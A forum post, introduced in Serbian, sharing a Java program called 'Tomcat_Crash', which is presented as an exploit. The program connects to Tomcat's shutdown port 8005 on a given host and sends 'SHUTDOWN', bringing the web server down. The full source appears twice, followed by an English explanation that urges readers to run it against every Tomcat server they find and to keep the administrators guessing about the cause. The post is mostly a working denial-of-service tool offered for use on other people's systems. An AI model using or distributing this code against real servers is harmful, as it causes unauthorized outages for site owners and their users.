Uglavnom vam prezentiram prvi:
/*Coded by Mil0s 2.1.2001.
mail: [email protected]
ICQ : 106635840*/
//Imports
import java.io.*;
import java.net.*;
public class Tomcat_Crash
{
public static void main(String[] args)
throws IOException {
/*
*Declarations
*/
int PORT= 8005;
String adress = null;
Socket socket = null;
/*
*Check the comamnd line for url
*/
if (args.length != 1)
{
System.out.print( "*****************************************************************************\n"
+"************Tomcat_Crash the first Tomcat exploit coded by Mil0s*************\n"
+"*****************************************************************************\n"
+"+------------------------+\n"
+"|mail: [email protected]|\n"
+"|ICQ uin: 106635840 |\n"
+"|site: www.coders.co.yu |\n"
+"+------------------------+\n");
System.out.println("Usage: java Tomcat_Crash <adress>");
return;
}else
adress = args[0];
try
{
socket = new Socket(adress,PORT);
/*
*Connecting to it and crashing it ...
*/
System.out.println("Connecting on" + adress + "\n" +"Crashing it...");
PrintWriter out =
new PrintWriter(
new BufferedWriter(
new OutputStreamWriter(
socket.getOutputStream())),true);
out.println("SHUTDOWN");
System.out.println("Tomcat is crashed :-)");
}//End of try
catch (IOException e)
{
System.out.println("Cannot connect on " + adress
+"check if you type adress correctly if you get this message again then the system is not vulnerable");
}
}//End of main
}//End of programm
To je bio kod a ovde imate objasnjeno:
[quote]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
***********Tomcat_Crash source code explaind***********
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Where is a bug???
Heh here it is:
<Server port="8005" shutdown="SHUTDOWN" debug="0">
Yes it is from server.conf what this line does???
Let's look at my source code :
/*Coded by Mil0s 2.1.2001.
mail: [email protected]
ICQ : 106635840*/
//Imports
import java.io.*;
import java.net.*;
public class Tomcat_Crash
{
public static void main(String[] args)
throws IOException {
/*
*Declarations
*/
int PORT= 8005;
String adress = null;
Socket socket = null;
/*
*Check the comamnd line for url
*/
if (args.length != 1)
{
System.out.print( "*****************************************************************************\n"
+"************Tomcat_Crash the first tomcat exploit coded by Mil0s*************\n"
+"*****************************************************************************\n"
+"+------------------------+\n"
+"|mail: [email protected]|\n"
+"|ICQ uin: 106635840 |\n"
+"|site: www.coders.co.yu |\n"
+"+------------------------+\n");
System.out.println("Usage: java Tomcat_Crash <adress>");
return;
}else
adress = args[0];
try
{
socket = new Socket(adress,PORT);
/*
*Connecting to it and crashing it ...
*/
System.out.println("Connecting on" + adress + "\n" +"Crashing it...");
PrintWriter out =
new PrintWriter(
new BufferedWriter(
new OutputStreamWriter(
socket.getOutputStream())),true);
out.println("SHUTDOWN");
System.out.println("Tomcat is crashed :-)");
}//End of try
catch (IOException e)
{
System.out.println("Cannot connect on " + adress
+"check if you type adress correctly if you get this message again the then system is not vulnerable");
}
}//End of main
}//End of programm
Yeah code is little :-) hehe...
out.println("SHUTDOWN"); -> this pice of code is whole exploit only thing you must do is to connect on port 8005 on host that have tomcat for webserver and then type "SHUTDOWN" without ""...
Pretty dumm heh whell many of admin's are dumm so you try that on evry server who got tomcat and remember if you crash a tomcat whole web server is crashed :)
Sure you can play mouse and cats with sys Admin's beacuse they will not know how that happend ;)
|++++++++++++++++++++++++++++++++++++++++++++|
|coded by Mil0s |
|mail:[email protected] |
|ICQ: 106635840 |
|++++++++++++++++++++++++++++++++++++++++++++|